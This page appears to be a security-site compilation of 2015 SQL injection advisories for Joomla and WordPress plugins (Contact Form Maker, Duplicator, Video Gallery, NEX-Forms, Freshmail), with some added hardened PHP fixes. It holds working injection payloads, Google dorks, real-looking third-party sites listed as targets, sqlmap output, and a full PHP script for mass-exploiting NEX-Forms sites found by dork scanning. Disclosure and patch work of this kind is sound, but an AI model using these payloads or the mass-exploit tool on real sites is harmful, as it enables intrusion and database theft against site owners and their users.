Channel: MondoUnix » SQL INJECTION

Joomla Contact Form Maker 1.0.1 SQL Injection

[+]Title: Joomla Contact Form Maker v1.0.1 Component - SQL injection vulnerability
[+]Author: TUNISIAN CYBER
[+]Date: 29/03/2015
[+]Vendor: http://extensions.joomla.org/extensions/extension/contacts-and-feedback/contact-forms/contact-form-maker
[+]Type: WebApp
[+]Risk: High
[+]Overview:
Contact Form Maker v1.0.1 suffers from an SQL injection vulnerability.
 
[+]Proof Of Concept:
 
127.0.0.1/index.php?option=com_contactformmaker&view=contactformmaker&id=SQL
 
 
https://hmg-e-publishing.com/index.php?option=com_contactformmaker&view=contactformmaker&id=-1%27
http://ariane.com/index.php?option=com_contactformmaker&view=contactformmaker&id=-1'



WordPress Duplicator 0.5.14 Cross Site Request Forgery / SQL Injection

######################
 
# Exploit Title : Wordpress Duplicator <= 0.5.14 - SQL Injection & CSRF
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://lifeinthegrid.com/labs/duplicator/
 
# Software Link : https://downloads.wordpress.org/plugin/duplicator.0.5.14.zip
 
# Date : 2015-04-08
 
# Tested on : Linux / Mozilla Firefox         
 
######################
 
# Description
 
 WordPress Duplicator 0.5.14 suffers from a remote SQL injection vulnerability.
 
 
 Location file: /view/actions.php
 
 This is the vulnerable AJAX function (wp_ajax_duplicator_package_delete), quoted as far as the advisory shows it:
 
 function duplicator_package_delete() {
     DUP_Util::CheckPermissions('export');
     try {
         global $wpdb;
         $json     = array();
         $post     = stripslashes_deep($_POST);
         $tblName  = $wpdb->prefix . 'duplicator_packages';
         $postIDs  = isset($post['duplicator_delid']) ? $post['duplicator_delid'] : null;  // attacker-controlled, never validated
         $list     = explode(",", $postIDs);
         $delCount = 0;
         if ($postIDs != null) {
             foreach ($list as $id) {
                 // each $id is interpolated unquoted into both queries
                 $getResult = $wpdb->get_results("SELECT name, hash FROM `{$tblName}` WHERE id = {$id}", ARRAY_A);
                 if ($getResult) {
                     $row       = $getResult[0];
                     $nameHash  = "{$row['name']}_{$row['hash']}";
                     $delResult = $wpdb->query("DELETE FROM `{$tblName}` WHERE id = {$id}");
                     if ($delResult != 0) {
                         // ... remainder of the function elided in the advisory
 
 
 The $post['duplicator_delid'] variable is not sanitized.
 
 An authorized user with the "export" permission, or a remote unauthenticated
 attacker who entices an authenticated admin into issuing the request (CSRF),
 could use this vulnerability to execute arbitrary SQL queries against the
 victim WordPress site.
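As an added example (not Duplicator's own code), a hardened version of this handler: a nonce check closes the CSRF vector, the capability check stays, every id in the comma-separated list is cast to an integer, and the delete runs as a single parameterised query. The file-removal steps the excerpt cuts off are left out, and the nonce action and field names (`duplicator_package_delete`, `duplicator_nonce`) are assumptions. The same cast-and-prepare pattern is the fix for the other single-integer AJAX parameters reported further down this page.

```php
<?php
// Added example, not the plugin's code. Assumes the WordPress runtime
// ($wpdb, check_ajax_referer, current_user_can, wp_send_json_*) and that
// the calling page sends a field "duplicator_nonce" created with
// wp_create_nonce('duplicator_package_delete') (both names assumed here).

function hardened_duplicator_package_delete() {
    global $wpdb;

    // CSRF defence: the request must carry a valid nonce bound to the
    // logged-in user. check_ajax_referer() terminates the request on failure.
    check_ajax_referer('duplicator_package_delete', 'duplicator_nonce');

    // Authorization: the original capability requirement is kept.
    if (!current_user_can('export')) {
        wp_send_json_error(array('message' => 'insufficient privileges'));
    }

    $raw = isset($_POST['duplicator_delid']) ? wp_unslash($_POST['duplicator_delid']) : '';

    // Input validation: the parameter is a comma-separated list of package
    // ids, so cast every element to int and keep only positive values.
    // A value such as "1 and (select ...)" collapses to 1 here.
    $ids = array_filter(array_map('intval', explode(',', $raw)), function ($id) {
        return $id > 0;
    });

    if (empty($ids)) {
        wp_send_json_error(array('message' => 'no valid package ids'));
    }

    $table = $wpdb->prefix . 'duplicator_packages';

    // Parameterised query: one %d placeholder per id, values bound through
    // $wpdb->prepare(), so user input can never alter the query structure.
    $placeholders = implode(',', array_fill(0, count($ids), '%d'));
    $sql = $wpdb->prepare(
        "DELETE FROM `{$table}` WHERE id IN ({$placeholders})",
        array_values($ids)
    );
    $deleted = $wpdb->query($sql);

    wp_send_json_success(array('deleted' => (int) $deleted));
}
add_action('wp_ajax_duplicator_package_delete', 'hardened_duplicator_package_delete');
```

The nonce check is what addresses the CSRF half of the report: a cross-site form post cannot know the victim's current nonce, so the handler dies before touching the database. The integer cast is deliberately applied before the query is built rather than relying on escaping, because the ids land in an unquoted numeric context where quote-escaping alone would not help.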
 
 
######################
 
# PoC
 
 http://target/wp-admin/admin-ajax.php?action=duplicator_package_delete
 
 POST: duplicator_delid=1 and (select * from (select(sleep(20)))a)
 
 
######################
 
# Vulnerability Disclosure Timeline:
 
2015-04-08:  Discovered vulnerability
2015-04-08:  Vendor Notification
2015-04-09:  Vendor Response/Feedback 
2015-04-10:  Vendor Send Fix/Patch
2015-04-10:  Public Disclosure 
 
#######################
 
Discovered By : Claudio Viviani
                http://www.homelab.it
        http://ffhd.homelab.it (Free Fuzzy Hashes Database)
 
                info@homelab.it
                homelabit@protonmail.ch
 
                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
 
#####################


WordPress Video Gallery 2.8 SQL Injection

######################
 
# Exploit Title : WordPress Video Gallery 2.8 SQL Injection Vulnerability
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery
 
# Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip
 
# Dork Google: inurl:/wp-admin/admin-ajax.php?action=googleadsense
 
 
# Date : 2015-04-04
 
# Tested on : Windows 7 / Mozilla Firefox
              Linux / Mozilla Firefox         
 
######################
 
# Description
 
 WordPress Video Gallery 2.8 suffers from an SQL injection vulnerability.
 
 
 Location file: /contus-video-gallery/hdflvvideoshare.php
 
 add_action('wp_ajax_googleadsense', 'google_adsense');
 add_action('wp_ajax_nonpriv_googleadsense', 'google_adsense');
 function google_adsense() {
     global $wpdb;
     $vid = $_GET['vid'];                      // attacker-controlled, never validated
     // $vid is concatenated unquoted into the first query
     $google_adsense_id = $wpdb->get_var('SELECT google_adsense_value FROM '.$wpdb->prefix.'hdflvvideoshare WHERE vid ='.$vid);
     $query = $wpdb->get_var('SELECT googleadsense_details FROM '.$wpdb->prefix.'hdflvvideoshare_vgoogleadsense WHERE id='.$google_adsense_id);
     $google_adsense = unserialize($query);
     echo $google_adsense['googleadsense_code'];
     die();
 }
 
 The value taken by $vid = $_GET['vid']; is not sanitized.
 
######################
 
# PoC
 
 http://target/wp-admin/admin-ajax.php?action=googleadsense&vid=[SQLi]
 
 
######################
 
# Vulnerability Disclosure Timeline:
 
2015-04-04:  Discovered vulnerability
2015-04-06:  Vendor Notification
2015-04-06:  Vendor Response/Feedback 
2015-04-07:  Vendor Send Fix/Patch (same version number)
2015-04-13:  Public Disclosure 
 
#######################
 
Discovered By : Claudio Viviani
                http://www.homelab.it
        http://ffhd.homelab.it (Free Fuzzy Hashes Database)
 
                info@homelab.it
                homelabit@protonmail.ch
 
                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
 
#####################


WordPress NEX-Forms 3.0 SQL Injection SQLMAP

######################
 
# Exploit Title : NEX-Forms 3.0 SQL Injection Vulnerability
 
# Exploit Author : Claudio Viviani
 
# Website Author: http://www.homelab.it
                  http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)
 
 
# Vendor Homepage : https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
 
# Software Link : https://downloads.wordpress.org/plugin/nex-forms-express-wp-form-builder.3.0.zip
 
# Dork Google: inurl:nex-forms-express-wp-form-builder
#              index of nex-forms-express-wp-form-builder
 
# Date : 2015-03-29
 
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
 
######################
 
# Info:
 
 The "submit_nex_form" AJAX function is affected by an SQL injection vulnerability.
 
 "nex_forms_Id" var is not sanitized
 
# PoC Exploit:
 
 http://TARGET/wordpress/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10 AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)
 
# Poc Video:
 
 http://youtu.be/04G08Cbrx1I
 
# PoC sqlmap:
 
 sqlmap -u "http://TARGET/wordpress/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10" -p nex_forms_Id --dbms mysql
 
 [23:15:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
 [23:15:48] [INFO] GET parameter 'nex_forms_Id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable 
 for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
 [23:15:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
 [23:15:55] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
 [23:16:01] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
 [23:16:07] [INFO] checking if the injection point on GET parameter 'nex_forms_Id' is a false positive
 GET parameter 'nex_forms_Id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
 sqlmap identified the following injection points with a total of 85 HTTP(s) requests:
 ---
 Parameter: nex_forms_Id (GET)
     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
     Payload: action=submit_nex_form&nex_forms_Id=10 AND (SELECT * FROM (SELECT(SLEEP(5)))NdbE)
 ---
 [23:16:34] [INFO] the back-end DBMS is MySQL
 web server operating system: Linux CentOS 5.10
 web application technology: PHP 5.3.3, Apache 2.2.3
 back-end DBMS: MySQL 5.0.12
 
######################
 
# Vulnerability Disclosure Timeline:
 
2015-03-29:  Discovered vulnerability
2015-04-16:  Vendor Notification
2015-04-17:  Vendor Response/Feedback 
2015-04-21:  Vendor Send Fix/Patch (same version number)
2015-04-21:  Public Disclosure 
 
#####################
 
Discovered By : Claudio Viviani
                http://www.homelab.it
                http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)
                http://ffhd.homelab.it (Free Fuzzy Hashes Database)
 
                info@homelab.it
                homelabit@protonmail.ch
 
                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
 
#####################


WordPress NEX-Forms 3.0 SQL Injection inurlbr

  # AUTHOR SCRIPT: Cleiton Pinheiro / Nick: googleINURL
  # Exploit name:  MINI 3xplo1t-SqlMap - WordPress NEX-Forms 3.0 SQL Injection Vulnerability
  # Type:          SQL Injection
  # Email:         inurlbr@gmail.com
  # Blog:          http://blog.inurl.com.br
  # Twitter:       https://twitter.com/googleinurl
  # Fanpage:       https://fb.com/InurlBrasil
  # Pastebin       http://pastebin.com/u/Googleinurl
  # GIT:           https://github.com/googleinurl
  # PSS:           http://packetstormsecurity.com/user/googleinurl
  # YOUTUBE:       http://youtube.com/c/INURLBrasil
  # PLUS:          http://google.com/+INURLBrasil
  # Who Discovered
http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli
  # Vulnerability discovered by: Claudio Viviani
 
 
 
# VENDOR
https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
 
# Vulnerability Description
The "submit_nex_form" AJAX function is affected by an SQL injection
vulnerability.
 
# Tool Description
Automation script that tests targets with the help of the sqlmap tool. It
executes the following sqlmap command:
 
{$params['folder']} -u '{$params['target']}/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1'
  --technique=B -p nex_forms_Id --dbms mysql {$params['proxy']} --random-agent
  --answers='follow=N' --dbs --batch --time-sec 10 --level 2 --risk 1
 
# GET VULN
SQL can be injected through the following GET parameter:
 
GET VULN:     nex_forms_Id=(id)
$nex_forms_Id=intval($_REQUEST['nex_forms_Id'])
Ex:
http://target.us/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1
 
# XPL inject DBMS: 'MySQL'
 
Exploit:  AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)
- GOOGLE DORK
 
inurl:nex-forms-express-wp-form-builder
index of nex-forms-express-wp-form-builde
# COMMAND --help:
 
    -t : SET TARGET.
    -f : SET FILE TARGETS.
    -p : SET PROXY
    Execute:
                  php wp3xplo1t.php -t target
                  php wp3xplo1t.php -f targets.txt
                  php wp3xplo1t.php -t target -p 'http://localhost:9090'
 
# EXPLOIT MASS USE SCANNER INURLBR
 
./inurlbr.php --dork 'inurl:nex-forms-express-wp-form-builder' -s wp3xplo1t.txt -q 1,6 --comand-vul "php wp3xplo1t.php -t '_TARGET_'"
# DOWNLOAD INURLBR
 
https://github.com/googleinurl/SCANNER-INURLBR
 
# REFERENCE
[1] http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli
 
EXPLOIT CODE:
 
<?php
 
/*
  [ I N U R L  -  B R A S I L ] - [ By GoogleINURL ]
 
-----------------------------------------------------------------------------
 
  # AUTHOR SCRIPT: Cleiton Pinheiro / Nick: googleINURL
  # Email:         inurlbr@gmail.com
  # Blog:          http://blog.inurl.com.br
  # Twitter:       https://twitter.com/googleinurl
  # Fanpage:       https://fb.com/InurlBrasil
  # Pastebin       http://pastebin.com/u/Googleinurl
  # GIT:           https://github.com/googleinurl
  # PSS:           http://packetstormsecurity.com/user/googleinurl
  # YOUTUBE:       http://youtube.com/c/INURLBrasil
  # PLUS:          http://google.com/+INURLBrasil
 
  # Who Discovered
http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli
  # Vulnerability discovered by: Claudio Viviani
 
-----------------------------------------------------------------------------
 
  # EXPLOIT NAME: MINI exploit-SQLMAP - WordPress NEX-Forms 3.0 SQL Injection Vulnerability / INURL BRASIL
  # VENDOR:
https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
  # Dork Google:  inurl:nex-forms-express-wp-form-builder
  # Dork Google:  index of nex-forms-express-wp-form-builde
  # GET VULN:     nex_forms_Id=(id)
  # $nex_forms_Id=intval($_REQUEST['nex_forms_Id'])
 
-----------------------------------------------------------------------------
 
  # DBMS: 'MySQL'
  # Exploit:       AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)
 
 
-----------------------------------------------------------------------------
 
  # Info:         The "submit_nex_form" AJAX function is affected by an SQL injection vulnerability
  # POC:
http://target.us/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=(id)+Exploit
 
-----------------------------------------------------------------------------
 
  # --help:
  -t : SET TARGET.
  -f : SET FILE TARGETS.
  -p : SET PROXY
  Execute:
  php wp3xplo1t.php -t target
  php wp3xplo1t.php -f targets.txt
  php wp3xplo1t.php -t target -p 'http://localhost:9090'
 
-----------------------------------------------------------------------------
 
  # EXPLOIT MASS USE SCANNER INURLBR
  # COMMAND: ./inurlbr.php --dork 'inurl:nex-forms-express-wp-form-builder'
-s wp3xplo1t.txt -q 1,6 --comand-vul "php wp3xplo1t.php -t '_TARGET_'"
  # DOWNLOAD INURLBR: https://github.com/googleinurl/SCANNER-INURLBR
 
-----------------------------------------------------------------------------
  INFO:
http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli/
 */
 
 
error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
$folder_SqlMap = "sqlmap"; // set the folder! ex: python ../../sqlmap/sqlmap.py
$op_ = getopt('f:t:p:', array('help::'));
echo "
\t\t\t\t  _____
\t\t\t\t (_____)    ____ _   _ _    _ _____  _                 ____        _ _
\t\t\t\t (() ())  |_   _| \ | | |  | |  __ \| |               |  _ \      (_) |
\t\t\t\t  \   /     | | |  \| | |  | | |__) | |       ______  | |_) |_ __ __ _ ___ _| |
\t\t\t\t   \ /      | | | . ` | |  | |  _  /| |      |______| |  _ <| '__/ _` / __| | |
\t\t\t\t   /=\     _| |_| |\  | |__| | | \ \| |____           | |_) | | | (_| \__ \ | |
\t\t\t\t  [___]   |_____|_| \_|\____/|_|  \_\______|          |____/|_|  \__,_|___/_|_|
\t\t\t\t\033[1;37m0xNeither war between hackers, nor peace for the system.\n
\t\t\t\t[+] [Exploit]: MINI 3xplo1t-SqlMap - WordPress NEX-Forms 3.0 SQL Injection Vulnerability / INURL BRASIL\n\t\t\t\t[+] [help]: --help\033[0m\n\n";
$menu = "
\t\t\t\t    -t : SET TARGET.
\t\t\t\t    -f : SET FILE TARGETS.
\t\t\t\t    -p : SET PROXY
\t\t\t\t    Execute:
\t\t\t\t                  php wp3xplo1t.php -t target
\t\t\t\t                  php wp3xplo1t.php -f targets.txt
\t\t\t\t                  php wp3xplo1t.php -t target -p 'http://localhost:9090'
\n";
echo isset($op_['help']) ? exit($menu) : NULL;
 
$params = array(
    'target' => not_isnull_empty($op_['t']) ? (strstr($op_['t'], 'http') ? $op_['t'] : "http://{$op_['t']}") : NULL,
    'file'   => !not_isnull_empty($op_['t']) && not_isnull_empty($op_['f']) ? $op_['f'] : NULL,
    'proxy'  => not_isnull_empty($op_['p']) ? "--proxy '{$op_['p']}'" : NULL,
    'folder' => $folder_SqlMap,
    'line'   => "\t\t\t\t--------------------------------------------------------------------------------------------------------"
);
 
not_isnull_empty($params['target']) && not_isnull_empty($params['file']) ? exit("\t\t\t\t[X] [ERRO] DEFINE TARGET OR FILE TARGET\n") : NULL;
not_isnull_empty($params['target']) ? __exec($params) . exit() : NULL;
not_isnull_empty($params['file']) ? __listTarget($params) . exit() : NULL;
 
function not_isnull_empty($valor = NULL) {
    RETURN !is_null($valor) && !empty($valor) ? TRUE : FALSE;
}
 
function __plus() {
    ob_flush();
    flush();
}
 
function __listTarget($file) {
    $tgt_ = array_unique(array_filter(explode("\n", file_get_contents($file['file']))));
    echo "\n\033[1;37m[!] [" . date("H:i:s") . "] [INFO] TOTAL TARGETS LOADED : " . count($tgt_) . "\033[0m\n";
    foreach ($tgt_ as $url) {
        echo "\033[1;37m[+] [" . date("H:i:s") . "] [INFO] SCANNING : {$url} \033[0m\n";
        __plus();
        $file['target'] = $url;
        __exec($file) . __plus();
    }
}
 
function __exec($params) {
    __plus();
    echo "\033[1;37m{$params['line']}\n[!] [" . date("H:i:s") . "] [INFO] starting SqlMap...\n";
    echo "[+] [" . date("H:i:s") . "] [INFO] TARGET: {$params['target']}/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id={SQL-INJECTION}\033[0m\n";
    $command = "{$params['folder']} -u '{$params['target']}/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1' "
            . " -p nex_forms_Id --dbms mysql {$params['proxy']} --random-agent "
            . " --answers='follow=N' --dbs --batch --time-sec 10 --level 2 --risk 1";
    system($command, $dados);
    __plus();
    exit(0);
}


WordPress Freshmail 1.5.8 SQL Injection

------------------------
ISSUE 1:
 
 
# Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
# Google Dork: N/A
# Date: 05/05/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: http://freshmail.com/
# Software Link: https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip
# Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache
2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
 
1. Summary
------------------
 
The Freshmail plugin is an email marketing plugin for WordPress, allowing the
administrator to create mail campaigns and keep track of them.

There is an SQL injection vulnerability available to contributors (or
higher-privileged users) on sites with the Freshmail plugin installed. The SQL
injection is located in the attribute "id" of the inserted shortcode
[FM_form id="N"]. The shortcode attribute "id" is not sanitized before
it is inserted into an SQL query.

A contributor can insert shortcodes while editing a new post or page and can
preview the result (no administrator approval needed), which triggers the SQL
injection.
 
 
2. Vulnerability timeline
----------------------------------
 
- 04/05/2015: Identified in version 1.5.8 and contacted the developer company
via Twitter.
- 05/05/2015: Sent the details to the developer by e-mail.
- 05/05/2015: Response from the developer.
- 06/05/2015: Fixed in version 1.6.
 
3. Vulnerable code
---------------------------
 
Vulnerable File: include/shortcode.php, lines 27 and 120:
 
Line 19:  function fm_form_func($atts)
[...]
Line 27:  $form_value = $wpdb->get_row("select * from ".$wpdb->prefix.'fm_forms where form_id="'.$atts['id'].'";');
[...]
Line 120: add_shortcode('FM_form', 'fm_form_func');
 
 
3. Proof of concept
---------------------------
 
1. As a contributor, start a new post.
2. Insert the shortcode [FM_form id='1" and substr(user(),1,1)="b']
3. Click preview.
4. If the form is shown, the statement is true, if not, false.
 
POST /wp-admin/post.php HTTP/1.1
Host: <web>
Content-Length: 3979
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: <web>
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/43.0.2357.37 Safari/537.36
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundary384PE6lRgBcOibkL
Referer: http://<web>/wp-admin/post.php?post=69&action=edit&message=8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,es;q=0.6
Cookie: wordpress_f305[...]
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_wpnonce"
 
0a75a3666b
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_wp_http_referer"
 
/wp-admin/post.php?post=69&action=edit&message=8
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="user_ID"
 
4
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="action"
 
editpost
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="originalaction"
 
editpost
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_author"
 
4
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_type"
 
post
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="original_post_status"
 
pending
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="referredby"
 
http://<web>/wp-admin/post.php?post=69&action=edit&message=8
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_wp_original_http_referer"
 
http://<web>/wp-admin/post.php?post=69&action=edit&message=8
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_ID"
 
69
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="meta-box-order-nonce"
 
f8aa04e508
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="closedpostboxesnonce"
 
ebf65a43ed
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_title"
 
Testing SQLi in shortcode
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="samplepermalinknonce"
 
e753a2d8f2
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="content"
 
[FM_form id='1" and substr(user(),1,1)="b]
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="wp-preview"
 
dopreview
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="original_publish"
 
Submit for Review
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_format"
 
0
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_category[]"
 
0
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_category[]"
 
1
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="tax_input[post_tag]"
 
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="newtag[post_tag]"
 
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="excerpt"
 
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="trackback_url"
 
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="metakeyselect"
 
#NONE#
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="metakeyinput"
 
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="metavalue"
 
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_ajax_nonce-add-meta"
 
6a13a5a808
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="advanced_view"
 
1
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="comment_status"
 
open
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="ping_status"
 
open
------WebKitFormBoundary384PE6lRgBcOibkL--
 
 
5. Solution
---------------
 
Update to version 1.6
 
 
------------------------
ISSUE 2:
 
# Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
# Google Dork: N/A
# Date: 05/05/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: http://freshmail.com/
# Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
 
1. Summary
------------------
 
The Freshmail plugin is an email marketing plugin for WordPress, allowing the
administrator to create mail campaigns and keep track of them.

There is an unauthenticated SQL injection vulnerability in the "Subscribe to
our newsletter" forms shown to web visitors, in the POST parameter
fm_form_id.
 
2. Vulnerability timeline
----------------------------------
 
- 04/05/2015: Identified in version 1.5.8 and contacted the developer company
via Twitter.
- 05/05/2015: Sent the details to the developer by e-mail.
- 05/05/2015: Response from the developer.
- 06/05/2015: Fixed in version 1.6.
 
3. Vulnerable code
---------------------------
 
Vulnerable File: include/wp_ajax_fm_form.php, lines 44 and 50
 
[...]
Line 28:  add_action('wp_ajax_fm_form', 'fm_form_ajax_func');
Line 29:  add_action('wp_ajax_nopriv_fm_form', 'fm_form_ajax_func');
[...]
Line 44: $result = $_POST;
[...]
Line 50: $form = $wpdb->get_row('select * from '.$wpdb->prefix.'fm_forms where form_id="'.$result['fm_form_id'].'";');
[...]
 
3. Proof of concept
---------------------------
 
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <web>
X-Requested-With: XMLHttpRequest
[...]
Cookie: wordpress_f30[...]
 
form%5Bemail%5D=fake@fake.com&form%5Bimie%5D=asdf&fm_form_id=1" and "a"="a&action=fm_form&fm_form_referer=%2F
 
4. Explanation
---------------------
 
A page visitor can submit an email (fake@fake.com) to subscribe to the
form with fm_form_id="1", and the JSON message received will be similar
to:

{"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"1","action":"fm_form","fm_form_referer":"\/?p=86","redirect":0,"status":"success","message":"Your sign up request was successful! Please check your email inbox."}
 
The second time the visitor tries the same request with the same email, the
message returned will be:

{"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"1","action":"fm_form","fm_form_referer":"\/?p=86","redirect":0,"status":"success","message":"Given email address is already subscribed, thank you!"}
 
If we insert 1" and substr(user(),1,1)="a we'll receive either the same
message indicating that the given email is already subscribed, which means
that the first character of the username is an "a", or a null message,
indicating that the first character of the username is not an "a".
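As an added example (not the plugin's code), one parameterised lookup that serves both Freshmail issues on this page: the shortcode attribute "id" from issue 1 and the POST parameter fm_form_id from issue 2. It assumes the WordPress runtime (`$wpdb`, `shortcode_atts`, `absint`, `wp_send_json`) and the fm_forms table named above; the function names and the rendering helper `fm_render_form()` are placeholders for output code the advisory does not show.

```php
<?php
// Added example, not Freshmail's code. Assumes the WordPress runtime and the
// {$wpdb->prefix}fm_forms table with a form_id column, as quoted above.
// fm_render_form() is an assumed helper standing in for the plugin's output.

function fm_get_form_by_id($form_id) {
    global $wpdb;
    // absint() turns any non-numeric or negative value into 0, and a value
    // such as 1" and substr(user(),1,1)="b into plain 1: the boolean oracle
    // described above cannot reach the query any more.
    $form_id = absint($form_id);
    if ($form_id === 0) {
        return null;
    }
    // %d binds an integer literal, so the double quote the original query
    // wrapped around the value (and that the payload terminated) is gone.
    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}fm_forms WHERE form_id = %d",
        $form_id
    );
    return $wpdb->get_row($sql);   // null when no row matches
}

// Issue 1: the [FM_form id="N"] shortcode, previewable by a contributor.
function hardened_fm_form_func($atts) {
    $atts = shortcode_atts(array('id' => 0), $atts, 'FM_form');
    $form = fm_get_form_by_id($atts['id']);
    if ($form === null) {
        return '';                 // unknown id: render nothing, leak nothing
    }
    return fm_render_form($form);  // assumed rendering helper
}
add_shortcode('FM_form', 'hardened_fm_form_func');

// Issue 2: the unauthenticated subscribe handler on wp_ajax_nopriv_fm_form.
function hardened_fm_form_ajax_func() {
    $post = wp_unslash($_POST);
    $raw_id = isset($post['fm_form_id']) ? $post['fm_form_id'] : 0;
    $form = fm_get_form_by_id($raw_id);
    if ($form === null) {
        // Same response for every invalid id, so the reply carries no
        // information about the database.
        wp_send_json(array('status' => 'error', 'message' => 'Unknown form.'));
    }
    // ... subscription handling continues with a trusted $form row ...
    wp_send_json(array(
        'status'     => 'success',
        'fm_form_id' => (int) $form->form_id,
        'message'    => 'Your sign up request was successful! Please check your email inbox.',
    ));
}
add_action('wp_ajax_fm_form', 'hardened_fm_form_ajax_func');
add_action('wp_ajax_nopriv_fm_form', 'hardened_fm_form_ajax_func');
```

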